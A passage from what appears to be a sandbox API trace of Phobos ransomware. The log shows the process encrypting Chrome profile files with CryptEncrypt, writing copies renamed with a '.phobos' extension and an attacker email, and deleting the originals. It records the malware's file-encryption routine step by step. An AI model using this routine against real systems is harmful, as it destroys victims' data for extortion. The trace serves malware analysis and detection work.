halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.253] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=15360) returned 1 [0185.253] CloseHandle (hObject=0x134) returned 1 [0185.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager")) returned 0x2020 [0185.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.253] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.253] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.254] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.254] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3c00, lpOverlapped=0x0) returned 1 [0185.339] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3c10, dwBufLen=0x3c10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3c10) returned 1 [0185.339] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3c10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3c10, lpOverlapped=0x0) returned 1 [0185.340] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0185.340] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.340] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0185.340] CryptDestroyKey (hKey=0xa32de8) returned 1 [0185.340] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0185.340] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.340] CloseHandle (hObject=0x134) returned 1 [0185.340] CloseHandle (hObject=0x180) returned 1 [0185.340] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager")) returned 1 [0185.341] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.342] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.342] CloseHandle (hObject=0x180) returned 1 [0185.342] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.343] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=180) returned 1 [0185.343] CloseHandle (hObject=0x180) returned 1 [0185.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme")) returned 0x2020 [0185.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.343] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.343] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.344] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.344] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.344] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xb4, lpOverlapped=0x0) returned 1 [0185.344] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xc0, dwBufLen=0xc0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xc0) returned 1 [0185.344] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xc0, lpOverlapped=0x0) returned 1 [0185.345] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0185.345] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.345] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0185.345] CryptDestroyKey (hKey=0xa32de8) returned 1 [0185.345] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0185.345] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.345] CloseHandle (hObject=0x180) returned 1 [0185.346] CloseHandle (hObject=0x134) returned 1 [0185.346] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme")) returned 1 [0185.346] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.349] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=35651) returned 1 [0185.349] CloseHandle (hObject=0x134) returned 1 [0185.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences")) returned 0x2020 [0185.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.349] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.349] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.349] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.349] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.349] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x8b43, lpOverlapped=0x0) returned 1 [0185.625] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x8b50, dwBufLen=0x8b50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x8b50) returned 1 [0185.625] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x8b50, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x8b50, lpOverlapped=0x0) returned 1 [0185.627] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0185.627] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.627] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0185.627] CryptDestroyKey (hKey=0xa32c28) returned 1 [0185.627] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0185.627] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.627] CloseHandle (hObject=0x134) returned 1 [0185.627] CloseHandle (hObject=0x180) returned 1 [0185.627] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences")) returned 1 [0185.628] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.629] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=12288) returned 1 [0185.629] CloseHandle (hObject=0x180) returned 1 [0185.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts")) returned 0x2020 [0185.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.629] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.630] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.630] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.630] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.630] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3000, lpOverlapped=0x0) returned 1 [0185.699] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3010, dwBufLen=0x3010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3010) returned 1 [0185.699] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3010, lpOverlapped=0x0) returned 1 [0185.700] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0185.700] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.700] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0185.700] CryptDestroyKey (hKey=0xa32c28) returned 1 [0185.700] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0185.700] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.700] CloseHandle (hObject=0x180) returned 1 [0185.700] CloseHandle (hObject=0x134) returned 1 [0185.701] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts")) returned 1 [0185.708] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.708] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.709] CloseHandle (hObject=0x134) returned 1 [0185.709] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.710] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16) returned 1 [0185.710] CloseHandle (hObject=0x134) returned 1 [0185.710] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current")) returned 0x2020 [0185.710] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.710] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.710] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.711] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.711] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.711] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10, lpOverlapped=0x0) returned 1 [0185.711] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0185.711] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0185.714] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0185.714] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.714] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, 